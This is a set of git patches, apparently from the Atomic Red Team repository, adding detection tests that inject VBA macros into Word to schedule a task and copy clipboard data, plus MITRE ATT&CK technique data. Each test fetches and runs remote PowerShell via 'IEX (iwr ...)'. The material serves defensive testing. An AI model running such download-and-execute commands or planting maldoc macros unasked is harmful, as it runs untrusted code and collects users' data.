From 4fc97b9206beeda19532cd3883f4533c585d4e67 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Thu, 10 Dec 2020 11:42:46 -0500 Subject: [PATCH 001/131] Taskscheduler (#1317) * initial push for T1053.005 (Task Scheduler via VBA) * updates * updates * updates Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1053.005/T1053.005.yaml | 30 +++++ atomics/T1053.005/src/T1053.005-macrocode.txt | 108 ++++++++++++++++++ 2 files changed, 138 insertions(+) create mode 100644 atomics/T1053.005/src/T1053.005-macrocode.txt diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index b4bd6f9c..4594e14d 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -100,3 +100,33 @@ atomic_tests: Register-ScheduledTask AtomicTask -InputObject $object cleanup_command: | Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 +- name: Task Scheduler via VBA + auto_generated_guid: + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft #{ms_product} must be installed + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" + name: powershell \ No newline at end of file diff --git a/atomics/T1053.005/src/T1053.005-macrocode.txt b/atomics/T1053.005/src/T1053.005-macrocode.txt new file mode 100644 index 00000000..8458970f --- /dev/null +++ b/atomics/T1053.005/src/T1053.005-macrocode.txt @@ -0,0 +1,108 @@ +Sub Scheduler() + +' Defined in taskschd.h +Const TASK_ACTION_EXEC = 0 +Const TASK_CREATE_OR_UPDATE = 6 +Const TASK_LOGON_INTERACTIVE_TOKEN = 3 + +' https://docs.microsoft.com/en-us/windows/win32/taskschd/trigger-type +' if cannot find the header file easily, look at +' +' https://docs.microsoft.com/en-us/windows/win32/api/taskschd/ne-taskschd-task_trigger_type2 +' +' and start counting from 0 to whatever and that number is the constant +Const TASK_TRIGGER_TIME = 1 + +Set service = CreateObject("Schedule.Service") +Call service.Connect + +Dim rootFolder +Set rootFolder = service.GetFolder("\") + +Dim taskDefinition +Set taskDefinition = service.NewTask(0) + +Dim regInfo +Set regInfo = taskDefinition.RegistrationInfo +regInfo.Description = "Start Notepad without UAC" +regInfo.Author = "Administrator" + +Dim principal +Set principal = taskDefinition.principal +principal.logonType = TASK_LOGON_INTERACTIVE_TOKEN + +Dim settings +Set settings = taskDefinition.settings +settings.Enabled = True +settings.StartWhenAvailable = True +settings.Hidden = False + +Dim triggers +Set triggers = taskDefinition.triggers + +Dim trigger +Set trigger = triggers.Create(TASK_TRIGGER_TIME) + +Dim startTime +Dim endTime + +Dim time +time = DateAdd("s", 10, Now) +startTime = XmlTime(time) + +time = DateAdd("m", 2, Now) +endTime = XmlTime(time) + +trigger.StartBoundary = startTime +trigger.EndBoundary = endTime +trigger.ExecutionTimeLimit = "PT5M" +trigger.ID = "TimeTriggerId" +trigger.Enabled = True + +Dim action +Set action = taskDefinition.Actions.Create(TASK_ACTION_EXEC) +action.Path = "C:\Windows\System32\notepad.exe" + +On Error Resume Next + +'TaskFolder.RegisterTaskDefinition( _ +' ByVal path, _ +' ByVal definition, _ +' ByVal flags, _ +' ByVal userId, _ +' ByVal password, _ +' ByVal logonType, _ +' [ ByVal sddl ], _ +' ByRef task _ +') + +Call rootFolder.RegisterTaskDefinition("Run Notepad", _ + taskDefinition, _ + TASK_CREATE_OR_UPDATE, _ + , _ + , _ + TASK_LOGON_INTERACTIVE_TOKEN) + +On Error GoTo 0 + +End Sub + +Function XmlTime(t) + +Dim cSecond, cMinute, CHour, cDay, cMonth, cYear +Dim tTime, tDate + +cSecond = "0" & Second(t) +cMinute = "0" & Minute(t) +CHour = "0" & Hour(t) +cDay = "0" & Day(t) +cMonth = "0" & Month(t) +cYear = Year(t) + +tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _ + ":" & Right(cSecond, 2) + +tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2) +XmlTime = tDate & "T" & tTime + +End Function \ No newline at end of file From 5f208eec00ddb74becb66b6649e821cd5a710db9 Mon Sep 17 00:00:00 2001 From: Ama Smuggle Avocados <47680420+amasmuggleavocados@users.noreply.github.com> Date: Thu, 10 Dec 2020 12:03:22 -0500 Subject: [PATCH 002/131] Clipboardvba (#1321) * initial push for T1115 (Collect Clipboard Data via VBA) * update to registry check * updates * updates * updates Co-authored-by: avocado Co-authored-by: Carrie Roberts --- atomics/T1115/T1115.yaml | 33 ++++++++++++++++++++++++++- atomics/T1115/src/T1115-macrocode.txt | 15 ++++++++++++ 2 files changed, 47 insertions(+), 1 deletion(-) create mode 100644 atomics/T1115/src/T1115-macrocode.txt diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 94e940a4..dce7f02a 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -36,4 +36,35 @@ atomic_tests: echo ifconfig | pbcopy $(pbpaste) name: bash - +- name: Collect Clipboard Data via VBA + auto_generated_guid: + description: | + This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: | + Microsoft #{ms_product} must be installed + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" + executor: + command: | + Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" + cleanup_command: | + Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore + name: powershell diff --git a/atomics/T1115/src/T1115-macrocode.txt b/atomics/T1115/src/T1115-macrocode.txt new file mode 100644 index 00000000..879faa5e --- /dev/null +++ b/atomics/T1115/src/T1115-macrocode.txt @@ -0,0 +1,15 @@ +Sub GetClipboard() + + outFile = Environ("TEMP") + "\atomic_T1115_clipboard_data.txt" + Set fs = CreateObject("Scripting.FileSystemObject") + Set out = fs.CreateTextFile(outFile, True) + + With CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}") + .GetFromClipboard + S = .GetText + End With + + out.WriteLine (S) + out.Close + +End Sub \ No newline at end of file From 10edd69822bb695198182fea15874c8f7507fac5 Mon Sep 17 00:00:00 2001 From: tsustyle <35687236+tsustyle@users.noreply.github.com> Date: Thu, 10 Dec 2020 17:57:03 -0500 Subject: [PATCH 003/131] Update T1059.003.yaml (#1324) --- atomics/T1059.003/T1059.003.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index 85f304d8..6f1466e5 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -4,7 +4,7 @@ atomic_tests: - name: Create and Execute Batch Script auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 description: | - Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again. + Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. supported_platforms: - windows input_arguments: @@ -30,4 +30,4 @@ atomic_tests: Start-Process #{script_path} cleanup_command: | Remove-Item #{script_path} -Force -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From f80bea245def184cf5aa9ea7f9da21a725082656 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 10 Dec 2020 18:03:27 -0700 Subject: [PATCH 004/131] updating enterprise-attack.json from Mitre (#1325) --- atomic_red_team/enterprise-attack.json | 33102 ++++++++++++++++++++--- 1 file changed, 29567 insertions(+), 3535 deletions(-) diff --git a/atomic_red_team/enterprise-attack.json b/atomic_red_team/enterprise-attack.json index e1d2da04..b23978c1 100644 --- a/atomic_red_team/enterprise-attack.json +++ b/atomic_red_team/enterprise-attack.json @@ -1,6 +1,6 @@ { "type": "bundle", - "id": "bundle--4ee91158-54a2-4744-8722-be32f062b9e8", + "id": "bundle--ad5f3bce-004b-417e-899d-392f8591ab55", "spec_version": "2.0", "objects": [ { @@ -118,6 +118,150 @@ "Linux" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1557.002", + "url": "https://attack.mitre.org/techniques/T1557/002" + }, + { + "source_name": "RFC826 ARP", + "url": "https://tools.ietf.org/html/rfc826", + "description": "Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020." + }, + { + "source_name": "Sans ARP Spoofing Aug 2003", + "url": "https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411", + "description": "Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020." + }, + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "ARP Cache Poisoning", + "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n", + "id": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "modified": "2020-10-16T15:22:11.604Z", + "created": "2020-10-15T12:05:58.755Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.", + "x_mitre_data_sources": [ + "Packet capture", + "Netflow/Enclave netflow" + ], + "x_mitre_contributors": [ + "Jon Sternstein, Stern Security" + ], + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1558.004", + "url": "https://attack.mitre.org/techniques/T1558/004" + }, + { + "source_name": "Harmj0y Roasting AS-REPs Jan 2017", + "url": "http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", + "description": "HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020." + }, + { + "source_name": "Microsoft Kerberos Preauth 2014", + "url": "https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx", + "description": "Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020." + }, + { + "source_name": "Stealthbits Cracking AS-REP Roasting Jun 2019", + "url": "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/", + "description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020." + }, + { + "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", + "source_name": "SANS Attacking Kerberos Nov 2014", + "url": "https://redsiege.com/kerberoast-slides" + }, + { + "url": "https://adsecurity.org/?p=2293", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "source_name": "AdSecurity Cracking Kerberos Dec 2015" + }, + { + "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/", + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "source_name": "Microsoft Detecting Kerberoasting Feb 2018" + }, + { + "source_name": "Microsoft 4768 TGT 2017", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768", + "description": "Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "AS-REP Roasting", + "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user\u2019s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", + "id": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "modified": "2020-10-20T19:30:11.783Z", + "created": "2020-08-24T13:43:00.028Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_system_requirements": [ + "Valid domain account" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)", + "x_mitre_data_sources": [ + "Windows event logs", + "Authentication logs" + ], + "x_mitre_contributors": [ + "James Dunn, @jamdunnDFW, EY", + "Swapnil Kumbhar", + "Jacques Pluviose, @Jacqueswildy_IT", + "Dan Nutting, @KerberToast" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "external_references": [ { @@ -144,7 +288,7 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-06-25T19:57:54.923Z", + "modified": "2020-07-22T21:36:52.825Z", "created": "2020-01-30T13:58:14.373Z", "x_mitre_data_sources": [ "Windows Registry", @@ -441,6 +585,11 @@ "source_name": "mitre-attack", "external_id": "T1087", "url": "https://attack.mitre.org/techniques/T1087" + }, + { + "external_id": "CAPEC-575", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html" } ], "object_marking_refs": [ @@ -453,7 +602,7 @@ "phase_name": "discovery" } ], - "modified": "2020-03-26T15:27:59.127Z", + "modified": "2020-09-16T15:10:18.260Z", "created": "2017-05-31T21:31:06.988Z", "x_mitre_is_subtechnique": false, "x_mitre_platforms": [ @@ -482,7 +631,7 @@ "Microsoft Threat Intelligence Center (MSTIC)", "Travis Smith, Tripwire" ], - "x_mitre_version": "2.1" + "x_mitre_version": "2.2" }, { "object_marking_refs": [ @@ -526,7 +675,7 @@ "phase_name": "persistence" } ], - "modified": "2020-07-15T12:43:37.469Z", + "modified": "2020-10-05T16:43:29.473Z", "created": "2017-05-31T21:31:12.196Z", "x_mitre_is_subtechnique": false, "x_mitre_version": "2.1", @@ -551,6 +700,87 @@ "macOS" ] }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583", + "url": "https://attack.mitre.org/techniques/T1583" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire Infrastructure", + "description": "Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "id": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T17:59:17.606Z", + "created": "2020-09-30T16:37:40.271Z", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false, + "x_mitre_detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "id": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "description": "Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "name": "Active Scanning", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1595", + "url": "https://attack.mitre.org/techniques/T1595" + }, + { + "source_name": "Botnet Scan", + "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf", + "description": "Dainotti, A. et al. (2012). Analysis of a \u201c/0\u201d Stealth Scan from a Botnet. Retrieved October 20, 2020." + }, + { + "source_name": "OWASP Fingerprinting", + "url": "https://wiki.owasp.org/index.php/OAT-004_Fingerprinting", + "description": "OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020." + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:06:50.402Z", + "created": "2020-10-02T16:53:16.526Z", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.0", + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_data_sources": [ + "Packet capture", + "Network device logs" + ] + }, { "external_references": [ { @@ -694,14 +924,29 @@ "source_name": "Demystifying Azure AD Service Principals", "url": "https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/", "description": "Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020." + }, + { + "source_name": "GCP SSH Key Add", + "url": "https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add", + "description": "Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020." + }, + { + "source_name": "Expel IO Evil in AWS", + "url": "https://expel.io/blog/finding-evil-in-aws/", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020." + }, + { + "source_name": "Expel Behind the Scenes", + "url": "https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/", + "description": "S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020." } ], "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Additional Azure Service Principal Credentials", - "description": "Adversaries may add adversary-controlled credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to maintain persistent access to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)", + "name": "Additional Cloud Credentials", + "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nAdversaries may add credentials for Azure Service Principals in addition to existing legitimate credentials(Citation: Create Azure Service Principal) to victim Azure accounts.(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) Azure Service Principals support both password and certificate credentials.(Citation: Why AAD Service Principals) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules.(Citation: Demystifying Azure AD Service Principals)\n\nAfter gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)", "id": "attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "type": "attack-pattern", "kill_chain_phases": [ @@ -710,24 +955,31 @@ "phase_name": "persistence" } ], - "modified": "2020-07-15T12:43:36.340Z", + "modified": "2020-10-05T16:43:27.024Z", "created": "2020-01-19T16:10:15.008Z", "x_mitre_contributors": [ + "Expel", "Oleg Kolesnikov, Securonix", "Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)" ], - "x_mitre_version": "1.0", + "x_mitre_version": "2.0", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ - "Administrator" + "Administrator", + "User" ], - "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", + "x_mitre_detection": "Monitor Azure Activity Logs for service principal modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", "x_mitre_data_sources": [ + "Stackdriver logs", + "GCP audit logs", + "AWS CloudTrail logs", "Azure activity logs" ], "x_mitre_platforms": [ "Azure AD", - "Azure" + "Azure", + "AWS", + "GCP" ] }, { @@ -962,6 +1214,16 @@ "url": "https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html", "description": "Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020." }, + { + "source_name": "SentinelOne AppleScript", + "url": "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/", + "description": "Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020." + }, + { + "source_name": "SentinelOne macOS Red Team", + "url": "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/", + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020." + }, { "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/", "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", @@ -973,7 +1235,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "AppleScript", - "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.\n\nosascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nAdversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", + "description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, 